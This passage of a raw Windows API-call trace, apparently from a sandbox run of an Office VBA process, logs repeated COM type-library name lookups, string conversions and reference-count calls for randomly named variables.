(This=0x665ba50) returned 0xd [0069.646] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.646] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_ckA1Bo", lHashVal=0x105c31, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.646] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.646] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.646] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_ckA1Bo", lHashVal=0x105c31, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.646] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.646] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.646] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_ckA1Bo", lHashVal=0x105c31, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.646] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.646] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.646] IUnknown:Release (This=0x665ba50) returned 0xd [0069.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87079e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_ckA1Bo") returned 14 [0069.647] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_ckA1Bo", lHashVal=0x105c31, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x63005f00720061, ppTypeComp=0x42003100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x63005f00720061, ppTypeComp=0x42003100000000, pDummy=0x0) returned 0x0 [0069.647] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b8154a | out: _Dst=0x144ec0) returned 0x0 [0069.647] ITypeComp:RemoteBind (in: This=0x665ba60, szName="UAABZx", lHashVal=0x102538, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81572, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="UAABZx") returned 7 [0069.647] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="UAABZx", lHashVal=0x102538, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81572, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="UAABZx") returned 7 [0069.647] ITypeComp:RemoteBind (in: This=0x665bd30, szName="UAABZx", lHashVal=0x102538, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.647] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UAABZx") returned 0x102538 [0069.647] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="UAABZx" | out: _Dst="UAABZx") returned 0x0 [0069.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="UAABZx") returned 7 [0069.647] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.647] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="UAABZx", lHashVal=0x102538, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.647] IUnknown:Release (This=0x665ba50) returned 0xd [0069.647] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.647] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="UAABZx", lHashVal=0x102538, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.647] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.647] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.647] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="UAABZx", lHashVal=0x102538, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.647] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.648] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.648] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="UAABZx", lHashVal=0x102538, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.648] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81572, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="UAABZx") returned 7 [0069.648] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="UAABZx", lHashVal=0x102538, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.648] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.648] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b81572 | out: _Dst=0x67c2d40) returned 0x0 [0069.648] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_UAABZx") returned 0x109fe1 [0069.648] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_UAABZx" | out: _Dst="_B_var_UAABZx") returned 0x0 [0069.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_UAABZx") returned 14 [0069.648] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.648] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_UAABZx", lHashVal=0x109fe1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.648] IUnknown:Release (This=0x665ba50) returned 0xd [0069.648] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.648] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_UAABZx", lHashVal=0x109fe1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.648] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.648] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.648] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_UAABZx", lHashVal=0x109fe1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.648] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.648] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.648] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_UAABZx", lHashVal=0x109fe1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.648] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.648] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.648] IUnknown:Release (This=0x665ba50) returned 0xd [0069.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8707ce, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_UAABZx") returned 14 [0069.648] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_UAABZx", lHashVal=0x109fe1, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x55005f00720061, ppTypeComp=0x5a004200000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x55005f00720061, ppTypeComp=0x5a004200000000, pDummy=0x0) returned 0x0 [0069.649] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b81572 | out: _Dst=0x144ec0) returned 0x0 [0069.649] ITypeComp:RemoteBind (in: This=0x665ba60, szName="tAD4cU", lHashVal=0x101167, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8159a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="tAD4cU") returned 7 [0069.649] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="tAD4cU", lHashVal=0x101167, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8159a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="tAD4cU") returned 7 [0069.649] ITypeComp:RemoteBind (in: This=0x665bd30, szName="tAD4cU", lHashVal=0x101167, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.649] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tAD4cU") returned 0x101167 [0069.649] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="tAD4cU" | out: _Dst="tAD4cU") returned 0x0 [0069.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="tAD4cU") returned 7 [0069.649] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.649] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="tAD4cU", lHashVal=0x101167, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.649] IUnknown:Release (This=0x665ba50) returned 0xd [0069.649] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.649] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="tAD4cU", lHashVal=0x101167, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.649] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.649] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.649] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="tAD4cU", lHashVal=0x101167, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.649] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.649] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.649] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="tAD4cU", lHashVal=0x101167, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.649] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8159a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="tAD4cU") returned 7 [0069.650] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="tAD4cU", lHashVal=0x101167, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.650] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.650] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b8159a | out: _Dst=0x67c2d40) returned 0x0 [0069.650] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_tAD4cU") returned 0x108c10 [0069.650] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_tAD4cU" | out: _Dst="_B_var_tAD4cU") returned 0x0 [0069.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_tAD4cU") returned 14 [0069.650] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.650] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_tAD4cU", lHashVal=0x108c10, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.650] IUnknown:Release (This=0x665ba50) returned 0xd [0069.650] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.650] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_tAD4cU", lHashVal=0x108c10, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.650] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.650] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.650] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_tAD4cU", lHashVal=0x108c10, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.650] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.650] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.650] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_tAD4cU", lHashVal=0x108c10, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.650] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.650] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.650] IUnknown:Release (This=0x665ba50) returned 0xd [0069.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8707fe, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_tAD4cU") returned 14 [0069.650] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_tAD4cU", lHashVal=0x108c10, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x74005f00720061, ppTypeComp=0x63003400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x74005f00720061, ppTypeComp=0x63003400000000, pDummy=0x0) returned 0x0 [0069.650] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b8159a | out: _Dst=0x144ec0) returned 0x0 [0069.651] ITypeComp:RemoteBind (in: This=0x665ba60, szName="FQXZQZ", lHashVal=0x1030e0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b815ea, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="FQXZQZ") returned 7 [0069.651] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="FQXZQZ", lHashVal=0x1030e0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b815ea, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="FQXZQZ") returned 7 [0069.651] ITypeComp:RemoteBind (in: This=0x665bd30, szName="FQXZQZ", lHashVal=0x1030e0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.651] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FQXZQZ") returned 0x1030e0 [0069.651] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="FQXZQZ" | out: _Dst="FQXZQZ") returned 0x0 [0069.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="FQXZQZ") returned 7 [0069.651] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.651] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="FQXZQZ", lHashVal=0x1030e0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.651] IUnknown:Release (This=0x665ba50) returned 0xd [0069.651] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.651] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="FQXZQZ", lHashVal=0x1030e0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.651] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.651] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.651] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="FQXZQZ", lHashVal=0x1030e0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.651] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.651] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.651] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="FQXZQZ", lHashVal=0x1030e0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.651] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b815ea, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="FQXZQZ") returned 7 [0069.651] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="FQXZQZ", lHashVal=0x1030e0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.652] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.652] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b815ea | out: _Dst=0x67c2d40) returned 0x0 [0069.652] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_FQXZQZ") returned 0x10ab89 [0069.652] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_FQXZQZ" | out: _Dst="_B_var_FQXZQZ") returned 0x0 [0069.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_FQXZQZ") returned 14 [0069.652] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.652] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_FQXZQZ", lHashVal=0x10ab89, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.652] IUnknown:Release (This=0x665ba50) returned 0xd [0069.652] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.652] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_FQXZQZ", lHashVal=0x10ab89, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.652] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.652] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.652] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_FQXZQZ", lHashVal=0x10ab89, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.652] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.652] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.652] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_FQXZQZ", lHashVal=0x10ab89, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.652] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.652] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.652] IUnknown:Release (This=0x665ba50) returned 0xd [0069.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87082e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_FQXZQZ") returned 14 [0069.652] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_FQXZQZ", lHashVal=0x10ab89, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x46005f00720061, ppTypeComp=0x51005a00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x46005f00720061, ppTypeComp=0x51005a00000000, pDummy=0x0) returned 0x0 [0069.652] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b815ea | out: _Dst=0x144ec0) returned 0x0 [0069.652] ITypeComp:RemoteBind (in: This=0x665ba60, szName="cZA__AG", lHashVal=0x1004ed, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b815c2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="cZA__AG") returned 8 [0069.653] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="cZA__AG", lHashVal=0x1004ed, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b815c2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="cZA__AG") returned 8 [0069.653] ITypeComp:RemoteBind (in: This=0x665bd30, szName="cZA__AG", lHashVal=0x1004ed, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.653] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cZA__AG") returned 0x1004ed [0069.653] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="cZA__AG" | out: _Dst="cZA__AG") returned 0x0 [0069.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="cZA__AG") returned 8 [0069.653] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.653] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="cZA__AG", lHashVal=0x1004ed, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.653] IUnknown:Release (This=0x665ba50) returned 0xd [0069.653] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.653] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="cZA__AG", lHashVal=0x1004ed, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.653] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.653] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.653] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="cZA__AG", lHashVal=0x1004ed, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.653] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.653] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.653] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="cZA__AG", lHashVal=0x1004ed, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.653] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b815c2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="cZA__AG") returned 8 [0069.653] ITypeComp:RemoteBind (in: 